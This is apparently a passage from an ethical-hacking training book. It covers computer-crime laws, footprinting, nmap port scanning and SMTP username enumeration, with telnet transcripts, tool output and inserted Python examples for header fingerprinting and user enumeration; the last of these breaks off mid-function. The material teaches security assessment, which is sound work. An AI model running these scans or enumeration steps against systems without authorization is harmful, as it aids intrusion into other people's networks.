One-Way Privilege Escalation.................................................................................................. 165
Web Application Vulnerabilities - Web Application Setup.......................................................... 169
XSS – Cross-Site-Scripting........................................................................................................ 169
Introduction......................................................................................................................... 169
Reflected XSS (Type I).......................................................................................................... 169
Permanent (Stored) XSS ...................................................................................................... 170
DOM XSS.............................................................................................................................. 170
XSS-Shell .............................................................................................................................. 170
XSS Worms........................................................................................................................... 171
The Future of SPAM............................................................................................................. 171
D.o.S attacks........................................................................................................................ 172
Information Gathering......................................................................................................... 173
Automated exploiting bots.................................................................................................. 173
Malware Script Detector ..................................................................................................... 174
Cross Site Request Forgery (CSRF/XSRF/Session Riding)......................................................... 174
Introduction......................................................................................................................... 174
The risks and common uses ................................................................................................ 175
Tokens vs. Personal Information as a solution for CSRF ..................................................... 176
Open/Un-Validated Site Redirection / Cross Domain Redirect............................................... 177
Common uses and Risks ...................................................................................................... 178
Validating Redirects and Forwards...................................................................................... 179
SQL-injection - What is SQL Injection? ........................................................................................ 180
Introduction............................................................................................................................. 180
The Practice............................................................................................................................. 181
Error Based SQL Injection.................................................................................................... 181
Union Based SQL Injection .................................................................................................. 181
Taking Over the Machine .................................................................................................... 182
SQL injection as a lead to other vulnerabilities....................................................................... 183
SQL injection Automated tools................................................................................................ 183
SQL injection Prevention......................................................................................................... 185
Web-Based Password Cracking Techniques - Authentication – Definition................................ 186
Hacking Wireless Networks......................................................................................................... 193
Introduction............................................................................................................................. 193
Wireless LAN Overview ........................................................................................................... 193
Stations and Access Points .................................................................................................. 194
Channels .............................................................................................................................. 194
WEP ..................................................................................................................................... 194
Infrastructure and Ad Hoc Modes....................................................................................... 194
Frames................................................................................................................................. 195
Authentication..................................................................................................................... 195
Association .......................................................................................................................... 196
Wireless Network Sniffing....................................................................................................... 197
Passive Scanning.................................................................................................................. 197
Detection of SSID................................................................................................................. 198
Collecting the MAC Addresses............................................................................................. 198
Collecting the Frames for Cracking WEP ............................................................................. 199
Detection of the Sniffers ..................................................................................................... 200
Wireless Spoofing.................................................................................................................... 200
MAC Address Spoofing........................................................................................................ 200
IP spoofing........................................................................................................................... 200
Frame Spoofing.................................................................................................................... 201
Wireless Network Probing....................................................................................................... 201
Detection of SSID................................................................................................................. 202
Detection of Probing ........................................................................................................... 202
AP Weaknesses........................................................................................................................ 202
Configuration....................................................................................................................... 203
Defeating MAC Filtering ...................................................................................................... 203
Rogue AP ............................................................................................................................. 203
Trojan AP ............................................................................................................................. 203
Equipment Flaws ................................................................................................................. 203
Denial of Service...................................................................................................................... 204
Jamming the Air Waves....................................................................................................... 204
Flooding with Associations.................................................................................................. 204
Forged Dissociation ............................................................................................................. 205
Forged De-Authentication................................................................................................... 205
Power Saving ....................................................................................................................... 205
Man-in-the-Middle Attacks ..................................................................................................... 205
Wireless MITM .................................................................................................................... 206
ARP Poisoning...................................................................................................................... 206
Session Hijacking ................................................................................................................. 207
War Driving.............................................................................................................................. 207
War chalking........................................................................................................................ 208
Typical Equipment............................................................................................................... 208
Wireless Security Best Practices.............................................................................................. 209
Location of the APs.............................................................................................................. 209
Proper Configuration........................................................................................................... 209
Secure Protocols.................................................................................................................. 210
Wireless IDS......................................................................................................................... 210
Wireless Auditing................................................................................................................. 211
Newer Standards and Protocols.......................................................................................... 211
Software Tools..................................................................................................................... 211
Conclusion ............................................................................................................................... 212
Physical Security.......................................................................................................................... 213
Dumpster diving ...................................................................................................................... 213
Overt document stealing......................................................................................................... 213
CRT vs. LCD vs. LED – Remote Screen Eavesdropping............................................................. 213
Ethernet vs. Optic Fibers ......................................................................................................... 214
Linux Hacking - Why Linux?......................................................................................................... 217
Linux/Apache privilege escalation........................................................................................... 217
Uploading the UNIX attack tools............................................................................................. 217
ptrace1.c.............................................................................................................................. 217
Evading IDS, Firewalls and Detecting Honey Pots - Introduction to Intrusion............................ 223
Introduction............................................................................................................................. 223
Honeypots versus steganography ........................................................................................... 223
Tools .................................................................................................................................... 224
User Mode Linux (UML)....................................................................................................... 224
VMware ............................................................................................................................... 227
Detecting additional lines of defense: chroot and jails....................................................... 229
Practical examples (continued) ............................................................................................... 230
Sebek-based Honeypots...................................................................................................... 230
Snort_inline ......................................................................................................................... 231
Fake AP ................................................................................................................................ 232
Bait and Switch Honeypots.................................................................................................. 232
Summary.................................................................................................................................. 233
Conclusion ............................................................................................................................... 234
Buffer Overflows - Why are Programs/Applications Vulnerable?.................................................. 235
Verify the bug.......................................................................................................................... 235
Verify the bug – and see if it could be interesting .................................................................. 236
Before we proceed – some theory.......................................................................................... 236
Process Memory.................................................................................................................. 237
The Stack ............................................................................................................................. 239
The debugger....................................................................................................................... 247
Determining the buffer size to write exactly into EIP ......................................................... 251
Find memory space to host the shellcode .......................................................................... 255
Jump to the shellcode in a reliable way .................................................................................. 258
Get shellcode and finalize the exploit ..................................................................................... 263
What if you want to do something else than launching calc? ................................................ 265
Heap Overflows....................................................................................................................... 270
Exploiting Heap Overflows .................................................................................................. 271
Off-By-One............................................................................................................................... 275
Signed vs. Un-Signed ............................................................................................................... 275
Memory Protection Mechanisms............................................................................................ 276
Security Cookie (Canary) ..................................................................................................... 276
SafeSEH................................................................................................................................ 277
Address Space Layout Randomization (ASLR) ..................................................................... 278
NX (No eXecute – Hardware DEP)....................................................................................... 279
NX – In Sun VM Environment.............................................................................................. 280
NX – Process Support .......................................................................................................... 281
Cryptography............................................................................................................................... 282
Hash......................................................................................................................................... 282
MD5 HASH “Reverse”.............................................................................................................. 282
Rainbow Tables ....................................................................................................................... 284
Introduction to Ethical Hacking - Problem Definition – Why?
In the past, hackers were kids who hacked in order to prove themselves the smartest
community and the best technologists. After succeeding in remotely penetrating an
organization and gaining control over one of its machines, they would usually stop there
and keep the vulnerability information to themselves or within their close community circle.
Today, hackers are people of all ages, motivated mostly by money. Where in the past a White-
Hat hacker, known as a "Security Researcher", would publish an information security advisory for
free in order to build a reputation and create new career opportunities, today such security
vulnerabilities are worth tens of thousands of dollars and are sold to private companies.
Much like the hacking scene, the cracking scene has also changed. In the past it was made up
of a few famous groups such as Myth, Fair-Light, Divine, Deviance and Paradigm, which were
mostly collections of teenagers interested in software piracy, who believed in creating "a
money-free world where all computer games and software are available to the rich and the
poor". Today, the cracking scene has shrunk to its core, and most of the crack download
portals are driven by organized crime, which deliberately bundles free software cracks with a
Trojan downloader, building computerized armies controlled through a botnet.
How does a hacker see the world?
The world's computer industry works to provide solutions to the needs of normal users. A
solution begins as an initiative or startup venture: it is designed by the Chief Architect and
passed down the chain to a product manager, who defines the user needs and the optimal user
experience, and from there to a software developer, who implements the defined requirements in
practice. It is important to remember that everyone in this chain is a normal person with a
single shared mission: creating a specific solution for a user or organization.
A true hacker is not a user, not just a developer and not just an architect; he is all of them
when it comes to the system's security. The hacker reviews the system and inspects the way
information flows between each level of the system as a whole, from the application level all
the way down to the bits leaving the machine's network interface. For the hacker, the graphical
user interface is just a mask over the underlying truth, which is uncovered using hacking tools.
A system can run in production for years and be used by thousands of normal and advanced
users without anyone noticing an obvious security flaw that a hacker can pick up in just a few
minutes. That is why a system that has not been reviewed and approved for use by a hacker is
not safe from one.
Hacking Laws (www.usdoj.gov)
United States of America:
Securely Protect Yourself Against Cyber Trespass Act (SPY ACT)
SEC. 2. PROHIBITION OF [UNFAIR OR] DECEPTIVE ACTS OR PRACTICES RELATING TO SPYWARE.
(a) Prohibition- It is unlawful for any person, who is not the owner or authorized user of a
protected computer, to engage in unfair or deceptive acts or practices that involve any
of the following conduct with respect to the protected computer:
(1) Taking control of the computer by:
(A) Utilizing a computer to send unsolicited information or material from the
computer to other computers;
(B) Diverting the Internet browser of the computer, or similar program of the
computer used to access and navigate the Internet:
(i) without authorization of the owner or authorized user of the
computer; and
(ii) away from the site the user intended to view, to one or more other
Web pages, such that the user is prevented from viewing the content at
the intended Web page, unless such diversion is otherwise authorized;
(C) Accessing, hijacking, or otherwise using the modem, or Internet connection
or service, for the computer and thereby causing damage to the computer or
causing the owner or authorized user or a third party defrauded by such
conduct to incur charges or other costs for a service that is not authorized by
such owner or authorized user;
(E) Delivering advertisements that a user of the computer cannot close without
undue effort or knowledge by the user or without turning off the computer or
closing all sessions of the Internet browser for the computer.
(2) Modifying settings related to use of the computer or to the computer's
access to or use of the Internet by altering:
(A) the Web page that appears when the owner or authorized user
launches an Internet browser or similar program used to access and
navigate the Internet;
(B) the default provider used to access or search the Internet, or other
existing Internet connection settings;
(3) Collecting personally identifiable information through the use of a
keystroke logging function.
(4) Inducing the owner or authorized user of a computer to disclose personally
identifiable information by means of a Web page that:
(A) is substantially similar to a Web page established or provided by
another person; and
(B) misleads the owner or authorized user that such Web page is
provided by such other person.
U.S. Federal Laws
• 18 U.S.C. §1029. Fraud and Related Activity in Connection with Access Devices
• 18 U.S.C. §1030. Fraud and Related Activity in Connection with Computers
• 18 U.S.C. §1362. Communication Lines, Stations, or Systems
• 18 U.S.C. §2510 et seq. Wire and Electronic Communications Interception and
Interception of Oral Communications
• 18 U.S.C. §2701 et seq. Stored Wire and Electronic Communications and Transactional
Records Access
Section 1029
Subsection (a) applies to whoever:
(1) Knowingly and with intent to defraud produces, uses, or traffics in one or more
counterfeit access devices;
(2) knowingly and with intent to defraud traffics in or uses one or more unauthorized
access devices during any one-year period, and by such conduct obtains anything of
value aggregating $1,000 or more during that period;
(3) Knowingly and with intent to defraud possesses fifteen or more devices which are
counterfeit or unauthorized access devices;
(4) Knowingly, and with intent to defraud, produces, traffics in, has control or custody
of, or possesses device-making equipment;
(5) knowingly and with intent to defraud effects transactions, with 1 or more access
devices issued to another person or persons, to receive payment or any other thing of
value during any 1-year period the aggregate value of which is equal to or greater than
$1,000;
(6) Without the authorization of the issuer of the access device, knowingly and with
intent to defraud solicits a person for the purpose of:
(A) Offering an access device; or
(B) Selling information regarding or an application to obtain an access device;
(7) Knowingly and with intent to defraud uses, produces, traffics in, has control or
custody of, or possesses a telecommunications instrument that has been modified or
altered to obtain unauthorized use of telecommunications services;
(8) Knowingly and with intent to defraud uses, produces, traffics in, has control or
custody of, or possesses a scanning receiver;
(9) Knowingly uses, produces, traffics in, has control or custody of, or possesses
hardware or software, knowing it has been configured to insert or modify
telecommunication identifying information associated with or contained in a
telecommunications instrument so that such instrument may be used to obtain
telecommunications service without authorization; or
(10) Without the authorization of the credit card system member or its agent, knowingly
and with intent to defraud causes or arranges for another person to present to the
member or its agent, for payment, 1 or more evidences or records of transactions made
by an access device.
The Punishments:
(A) In the case of an offense that does not occur after a conviction for another offense
under this section:
(i) If the offense is under paragraph (1), (2), (3), (6), (7), or (10) of subsection (a),
a fine under this title or imprisonment for not more than 10 years, or both; and
(ii) If the offense is under paragraph (4), (5), (8), or (9) of subsection (a), a fine
under this title or imprisonment for not more than 15 years, or both;
(B) in the case of an offense that occurs after a conviction for another offense under this
section, a fine under this title or imprisonment for not more than 20 years, or both; and
(C) in either case, forfeiture to the United States of any personal property used or
intended to be used to commit the offense
Section 1030
Subsection (a)(1): having knowingly accessed a computer without authorization or exceeding
authorized access, and by means of such conduct having obtained information that has been
determined by the United States Government pursuant to an Executive order or statute to
require protection against unauthorized disclosure for reasons of national defense or foreign
relations, or any restricted data, as defined in paragraph y of section 11 of the Atomic Energy
Act of 1954, with reason to believe that such information so obtained could be used to the
injury of the United States, or to the advantage of any foreign nation willfully communicates,
delivers, transmits, or causes to be communicated, delivered, or transmitted, or attempts to
communicate, deliver, transmit or cause to be communicated, delivered, or transmitted the
same to any person not entitled to receive it, or willfully retains the same and fails to deliver it
to the officer or employee of the United States entitled to receive it;
(2) Intentionally accesses a computer without authorization or exceeds authorized
access, and thereby obtains:
(A) information contained in a financial record of a financial institution, or of a
card issuer as defined in section 1602(n) of title 15, or contained in a file of a
consumer reporting agency on a consumer, as such terms are defined in the Fair
Credit Reporting Act (15 U.S.C. 1681 et seq.);
(B) Information from any department or agency of the United States; or
(C) Information from any protected computer if the conduct involved an
interstate or foreign communication;
(3) intentionally, without authorization to access any nonpublic computer of a
department or agency of the United States, accesses such a computer of that
department or agency that is exclusively for the use of the Government of the United
States or, in the case of a computer not exclusively for such use, is used by or for the
Government of the United States and such conduct affects that use by or for the
Government of the United States;
(4) knowingly and with intent to defraud, accesses a protected computer without
authorization, or exceeds authorized access, and by means of such conduct furthers the
intended fraud and obtains anything of value, unless the object of the fraud and the
thing obtained consists only of the use of the computer and the value of such use is not
more than $5,000 in any 1-year period;
(5)(A)(i) Knowingly causes the transmission of a program, information, code, or
command, and as a result of such conduct, intentionally causes damage without
authorization, to a protected computer
(ii) intentionally accesses a protected computer without authorization, and as a
result of such conduct, recklessly causes damage; or
(iii) Intentionally access a protected computer without authorization, and as a
result of such conduct, causes damage; and
(5)(B) By conduct described in clause (i), (ii), or (iii) of subparagraph (A), caused (or, in
the case of an attempted offense, would, if completed, have caused):
(i) loss to 1 or more persons during any 1-year period (and, for purposes of an
investigation, prosecution, or other proceeding brought by the United States
only, loss resulting from a related course of conduct affecting 1 or more other
protected computers) aggregating at least $5,000 in value;
(ii) The modification or impairment, or potential modification or impairment, of
the medical examination, diagnosis, treatment, or care of 1 or more individuals;
(iii) physical injury to any person;
(iv) a threat to public health or safety; or
(v) damage affecting a computer system used by or for a government entity in
furtherance of the administration of justice, national defense, or national
security;
(6) Knowingly and with intent to defraud traffics (as defined in section 1029) in any
password or similar information through which a computer may be accessed without
authorization, if:
(A) Such trafficking affects interstate or foreign commerce; or
(B) such computer is used by or for the Government of the United States;
(7) With intent to extort from any person any money or other thing of value, transmits
in interstate or foreign commerce any communication containing any threat to cause
damage to a protected computer;
The Punishments:
(1)(A) a fine under this title or imprisonment for not more than ten years, or both, in the
case of an offense under subsection (a)(1) of this section which does not occur after a
conviction for another offense under this section, or an attempt to commit an offense
punishable under this subparagraph; and
(B) a fine under this title or imprisonment for not more than twenty years, or both, in
the case of an offense under subsection (a)(1) of this section which occurs after a
conviction for another offense under this section, or an attempt to commit an offense
punishable under this subparagraph;
(2)(A) except as provided in subparagraph (B), a fine under this title or imprisonment for
not more than one year, or both, in the case of an offense under subsection (a)(2),
(a)(3), (a)(5)(A)(iii), or (a)(6) of this section which does not occur after a conviction for
another offense under this section, or an attempt to commit an offense punishable
under this subparagraph;
(B) a fine under this title or imprisonment for not more than 5 years, or both, in the case
of an offense under subsection (a)(2), or an attempt to commit an offense punishable
under this subparagraph, if:
• (i) the offense was committed for purposes of commercial advantage or
private financial gain;
• (ii) the offense was committed in furtherance of any criminal or tortious act
in violation of the Constitution or laws of the United States or of any State; or
• (iii) The value of the information obtained exceeds $5,000;
(C) a fine under this title or imprisonment for not more than ten years, or both, in the
case of an offense under subsection (a)(2), (a)(3) or (a)(6) of this section which occurs
after a conviction for another offense under this section, or an attempt to commit an
offense punishable under this subparagraph;
(3)(A) a fine under this title or imprisonment for not more than five years, or both, in the
case of an offense under subsection (a)(4) or (a)(7) of this section which does not occur
after a conviction for another offense under this section, or an attempt to commit an
offense punishable under this subparagraph; and (3)(B) a fine under this title or
imprisonment for not more than ten years, or both, in the case of an offense under
subsection (a)(4), (a)(5)(A)(iii), or (a)(7) of this section which occurs after a conviction for
another offense under this section, or an attempt to commit an offense punishable
under this subparagraph; and
18 U.S.C. §1362
This law applies when:
• Person willfully injures or destroys any of the works, property, or material of any
means of communication
• Maliciously obstructs, hinders, or delays the transmission of any communication
Punishment:
• A fine or imprisonment for not more than 10 years, or both
18 U.S.C. §2318 - Trafficking in counterfeit…
Label for phone records, copies of computer programs or computer program documentation or
packaging, and copies of motion pictures or other audio visual works, and trafficking in
counterfeit computer program documentation or packaging
This law applies when:
• Person knowingly traffics in a counterfeit label affixed or designed to be affixed
• Intentionally traffics in counterfeit documentation or packaging for a computer
program
Punishment:
• A financial fine or imprisonment for not more than five years, or both
18 U.S.C. §2320 - Trademark Offenses Trafficking in counterfeit goods or services
This law applies when:
• Person intentionally traffics or attempts to traffic in goods or services
• Knowingly uses a counterfeit mark
Punishment:
• A financial fine of not more than $2,000,000 or imprisoned not more than 10 years, or
both
18 U.S.C. §1831 - Trade Secret Offenses Economic espionage Law
This law applies when:
• Person knowingly steals or without authorization obtains a trade secret
• Without authorization copies or transmits a trade secret
• Receives, buys, or possesses a trade secret
Punishment:
• A financial fine of not more than $10,000,000
47 U.S.C. §605 - Unauthorized publication or use of communications
This law applies when:
• Receiving, assisting in receiving, transmitting, or assisting in transmitting, any
interstate or foreign communication by wire or radio
• Intercepting any radio communication and divulging or publishing the existence,
contents, substance, purport, effect, or meaning of such intercepted communication
to any person
• Scrambling of Public Broadcasting Service programming
Punishment:
• A financial fine of not more than $2,000 or imprisoned for not more than 6 months, or
both
More US Laws:
• Federal Managers Financial Integrity Act of 1982
• The Freedom of Information Act [5 U.S.C.§552]
• Federal Information Security Management Act (FISMA)
• The Privacy Act Of 1974 [5 U.S.C.§552a]
• USA Patriot Act of 2001
• Government Paperwork Elimination Act (GPEA)
European Union:
• SUBSTANTIVE CRIMINAL LAW
o Offences against the confidentiality, integrity and availability of computer data
and systems
o illegal Access: Each Party shall adopt such legislative and other measures as may
be necessary to establish as criminal offences under its domestic law, when
committed intentionally, the access to the whole or any part of a computer
system without right
o Illegal Interception
o Data Interference
UK:
• Computer Misuse Act 1990
• Police and Justice Act 2006
Foot-printing / Reconnaissance
Reconnaissance is the step in which the attacker gathers as much information as possible
about the target. Reconnaissance is truly an art and is one of the most important stages of
the attack process. It is the attacker's eyes on the target; without it the attack is carried out
blindly, and the odds of success drop to a minimum.
Foot-Printing Each Service's Server Software Name and Version
Foot-Printing HTTP Servers
Getting the server type and disclosing internal information such as the machine's internal host name,
its internal IP address, whether a proxy or reverse proxy is in use, etc.
The following error page reveals that the server is Apache Tomcat, the machine's internal name, and
that the error originated in the proxy component:
The following reveals the server's type and its exact version:
It is possible to change the values of the request parameters, trigger application errors and
determine the operating system and the local path of the website's root folder:
It is possible to identify the server type, the development platform and installed plugins by
inspecting the returned HTTP headers and the supported HTTP methods:
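The header-based fingerprint just described, as an added example that is not code from the original document: it parses the Server, X-Powered-By, Via and Allow headers of an OPTIONS response and flags methods worth a second look. The sample response below is constructed for an imaginary Tomcat host behind a proxy; probe() does the same against a live host and needs network access.

```python
import http.client

# Constructed sample (not captured from any real host): what an OPTIONS
# request against a hypothetical Tomcat behind a corporate proxy might return.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache-Coyote/1.1\r\n"
    b"X-Powered-By: Servlet/3.0 JSP/2.2\r\n"
    b"Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS, TRACE\r\n"
    b"Via: 1.1 proxy01.corp.example\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

# Headers that leak server software, platform or infrastructure details.
LEAKY_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "via", "x-generator")
# Methods whose presence in Allow deserves follow-up during an assessment.
RISKY_METHODS = {"PUT", "DELETE", "TRACE", "CONNECT", "PROPFIND"}


def parse_headers(raw: bytes) -> dict:
    """Parse a raw HTTP response head into a lower-cased header dict."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = {}
    for line in head.split("\r\n")[1:]:          # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def fingerprint(headers: dict) -> dict:
    """Summarise software leaks and allowed/risky methods from parsed headers."""
    leaks = {h: headers[h] for h in LEAKY_HEADERS if h in headers}
    allowed = [m.strip().upper() for m in headers.get("allow", "").split(",")
               if m.strip()]
    return {
        "leaks": leaks,
        "allowed_methods": allowed,
        "risky_methods": sorted(RISKY_METHODS.intersection(allowed)),
    }


def probe(host: str, port: int = 80, path: str = "/", timeout: float = 5.0) -> dict:
    """Send a live OPTIONS request (needs network; not used by the offline test)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("OPTIONS", path, headers={"Host": host})
        resp = conn.getresponse()
        return fingerprint({k.lower(): v for k, v in resp.getheaders()})
    finally:
        conn.close()


if __name__ == "__main__":
    print(fingerprint(parse_headers(SAMPLE_RESPONSE)))
```

Note that many servers answer OPTIONS with a generic Allow list or none at all; the reliable check for a dangerous method is to send it (a PUT to a harmless path, a TRACE with a marker header) and look at the response.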
Foot-Printing FTP Servers
Most File Transfer Protocol (FTP) servers expose a banner containing the server name and version by
default. All an attacker has to do is connect to the server and read the greeting; the version is
usually in the first non-empty line. For example:
220-Serv-U FTP Server v6.4 for WinSock ready...
220-Welcome to XXXXX, home of Your FTP Server
220-
220 Local time is 13:36:08,
Foot-Printing Telnet Servers
Some telnet servers have banners revealing the name of the vendor, organization or product:
Some servers show a legal warning banner; its wording may be used to identify the product or
to tell remotely that several machines belong to the same organization. For example:
Fingerprinting VoIP Servers:
One of the most widely used VoIP security assessment toolkits is SIPVicious.
Fingerprinting Products of Specific Vendors:
It is possible to identify a specific vendor by the texts or messages that vendor uses for
titles, errors and authentication requests. For example, the web server of practically every
Cisco product with "Basic Authentication" enabled uses the realm "level_15_access" by default:
Using Zenmap (the Nmap GUI) to fingerprint the exact product type and version:
Scanning for services listening on TCP port 990 finds a Check Point firewall VPN portal whose
login can be brute-forced:
On some installations it is reconfigured to listen on port 80:
Scanning for "Check Point Certificate Services" listening on TCP port 18264 has always been a
reliable way of finding Check Point firewalls:
Identifying Check Point VPN-1 Edge Portal
WHOIS
Every IP address and domain on the Internet is registered to someone. The public registration
databases can be queried to retrieve information about the owner of an IP address or domain.
Querying IP addresses is usually called "IP WHOIS" or "Inet-WHOIS", and querying domain names
"Domain WHOIS" or "Inic-WHOIS".
An attacker can retrieve network information with an information-gathering tool such as
Dmitry:
Where the domain (Inic) WHOIS record may be masked, private, proxied or censored:
the IP (Inet) WHOIS record usually is not:
Or by using a free public online service such as:
http://www.dnsstuff.com
http://www.dnstools.com
http://www.centralops.net
For Example:
Finding Exploitable Vulnerable Web Systems by Signature
Choosing a public exploit:
Finding a vulnerable website
Finding a vulnerable machine as the exploitation target can be done by using Google to find
websites containing a similar long path or directory tree:
Alternately, the vulnerable website can be found by using the “Powered by” signature of open
source projects:
Verifying the vulnerability exists
Exploiting the Vulnerability
Opening a free hosting account
Scanning
Scanning is the phase of discovering the machines, protocols and ports that exist in an
accessible computer network. Port scanning is an art and a crucial part of the reconnaissance
process. Many junior information security personnel make mistakes during the scanning
process and fail to discover certain machines and services, which results in vulnerabilities
not being found and therefore not repaired.
The common scanning concept relies on the idea that a certain service listens on a default
port number, so that successfully connecting to that port makes it reasonable to assume
that the expected service is there. To positively identify the true service listening on a
port, the scanner sends the opening message ("hello") of each protocol in its probe database
until it gets a response in the same protocol.
The most famous scanner is Nmap, which has been developed since 1997 and supports
practically every known port scanning method. The two most common port scanning methods
are the SYN scan and the connect scan.
• Connect Scan: nmap -Pn --open -v -A -p1-65535 -sT <ip>
o Slower
o 100% reliable (if you can connect, then the port is publicly open)
o Allows querying the true underlying service
o Can be implemented in any programming language (even JavaScript)
• SYN Scan: nmap -Pn --open -v -A -p1-65535 -sS <ip>
o Fastest scanning method
o Sends only one packet for each port (the handshake is never completed)
o Requires raw-socket privileges (root on Unix-like systems, the Npcap/WinPcap driver on Windows)
o Might trigger a false "SYN flood" alarm in firewalls, IDS or IPS
Enumeration
Enumerating the allowed HTTP Methods on a Web Server:
Enumerating Usernames Using Google
Exposed Configuration Files
Company Email Addresses:
In most cases, the local part of a user's email address is also his username inside the company,
especially when Single Sign-On (SSO) is implemented.
SMTP Enumeration (VRFY, EXPN, RCPT TO, NDR)
Using the SMTP VRFY Command
It is possible to enumerate existing users and email aliases using the standard SMTP VRFY
command. The process can be automated with a simple script/tool such as "smtp-user-enum.pl".
The output below shows how the SMTP server responds differently to VRFY requests for valid and
invalid users. It is recommended that a manual check like the following is carried out before running
smtp-user-enum. Obviously the tool won't work if the server doesn't respond differently to requests
for valid and invalid users.
$ telnet 10.0.0.1 25
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
VRFY no_such
550 no_such... User unknown
VRFY root
250 Super-User <root@myhost>
To use smtp-user-enum to enumerate valid usernames using the VRFY command, first
prepare a list of usernames (users.txt) and run the tool as follows:
$ smtp-user-enum.pl -M VRFY -U users.txt -t 10.0.0.1
Starting smtp-user-enum v1.0 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 47
Target TCP port .......... 25
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Sun Jan 21 18:01:50 2011 #########
root@10.0.0.1: Exists
bin@10.0.0.1: Exists
daemon@10.0.0.1: Exists
lp@10.0.0.1: Exists
adm@10.0.0.1: Exists
uucp@10.0.0.1: Exists
postmaster@10.0.0.1: Exists
nobody@10.0.0.1: Exists
ftp@10.0.0.1: Exists
######## Scan completed at Sun Jan 21 18:01:50 2011 #########
9 results.
47 queries in 1 seconds (47.0 queries / sec)
It's worth noting that postmaster is not actually a valid OS-level user account - it's a mail
alias.
Using the SMTP EXPN Command
The output below shows how the SMTP server responds differently to EXPN requests for
valid and invalid users.
$ telnet 10.0.0.1 25
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
EXPN no_such
550 no_such... User unknown
EXPN root
250 Super-User <root@myhost>
To use smtp-user-enum to enumerate valid usernames using the EXPN command, first
prepare a list of usernames (users.txt) and run the tool as follows (unsurprisingly, we get
the same results as above):
$ smtp-user-enum.pl -M EXPN -U users.txt -t 10.0.0.1
Starting smtp-user-enum v1.0 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... EXPN
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 47
Target TCP port .......... 25
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Sun Jan 21 18:01:50 2011 #########
root@10.0.0.1: Exists
bin@10.0.0.1: Exists
daemon@10.0.0.1: Exists
lp@10.0.0.1: Exists
adm@10.0.0.1: Exists
uucp@10.0.0.1: Exists
postmaster@10.0.0.1: Exists
nobody@10.0.0.1: Exists
ftp@10.0.0.1: Exists
######## Scan completed at Sun Jan 21 18:01:50 2011 #########
9 results.
47 queries in 1 seconds (47.0 queries / sec)
Using the SMTP RCPT TO Command
The output below shows how the SMTP server responds differently to RCPT TO requests
for valid and invalid users. This is often the most useful technique, as VRFY and EXPN
are frequently disabled to prevent username enumeration.
$ telnet 10.0.0.1 25
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
MAIL FROM:root
250 root... Sender ok
RCPT TO: no_such
550 no_such... User unknown
RCPT TO:root
250 root... Recipient ok
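The three techniques above (VRFY, EXPN and RCPT TO) driven from one script, as an added example that is neither the smtp-user-enum tool nor code from the original document. The server it talks to is a constructed stand-in started on localhost, with replies modelled on the Sendmail transcripts above; with vrfy_enabled=False it answers VRFY and EXPN with 252, the way hardened MTAs do, and the enumerator falls back to RCPT TO.

```python
import socket
import threading

# Constructed stand-in for the Sendmail host in the transcripts above so the
# example runs offline; with vrfy_enabled=False it answers VRFY/EXPN with 252,
# as hardened MTAs do, and only RCPT TO still discriminates.
KNOWN_USERS = {"root", "bin", "daemon", "postmaster"}


def handle_smtp_client(conn, vrfy_enabled):
    conn.sendall(b"220 myhost ESMTP Sendmail 8.9.3\r\n")
    for raw in conn.makefile("rb"):
        verb, _, arg = raw.decode("latin-1").strip().partition(" ")
        verb, arg = verb.upper(), arg.strip()
        if verb in ("VRFY", "EXPN") and not vrfy_enabled:
            reply = "252 Cannot VRFY user; try RCPT to attempt delivery"
        elif verb in ("VRFY", "EXPN", "RCPT"):
            user = arg.split(":", 1)[-1].strip("<> ").split("@")[0]
            reply = (f"250 {user} <{user}@myhost>" if user in KNOWN_USERS
                     else f"550 {user}... User unknown")
        elif verb in ("HELO", "MAIL", "RSET"):
            reply = "250 myhost OK"
        elif verb == "QUIT":
            conn.sendall(b"221 Bye\r\n")
            return
        else:
            reply = "500 Command unrecognized"
        conn.sendall(reply.encode() + b"\r\n")


def start_fake_smtp(vrfy_enabled=True):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return                       # listener closed
            with conn:
                try:
                    handle_smtp_client(conn, vrfy_enabled)
                except OSError:
                    pass                     # client dropped mid-session
    threading.Thread(target=loop, daemon=True).start()
    return srv, srv.getsockname()[1]


class SmtpSession:
    """One SMTP connection: reads multi-line replies and sends commands."""
    def __init__(self, host, port, timeout=5.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.rfile = self.sock.makefile("rb")
        self.reply()                         # 220 banner
        self.cmd("HELO x")

    def reply(self):
        while True:                          # "250-" continues, "250 " ends
            text = self.rfile.readline().decode("latin-1")
            if not text:
                raise ConnectionError("server closed the connection")
            if len(text) < 4 or text[3] != "-":
                return text.rstrip()

    def cmd(self, line):
        self.sock.sendall(line.encode() + b"\r\n")
        return self.reply()

    def close(self):
        try:
            self.cmd("QUIT")
        finally:
            self.sock.close()


def check_user(session, user, mode):
    """True = exists, False = unknown, None = this verb is not usable here."""
    if mode == "RCPT":
        session.cmd("MAIL FROM:<probe@example.net>")
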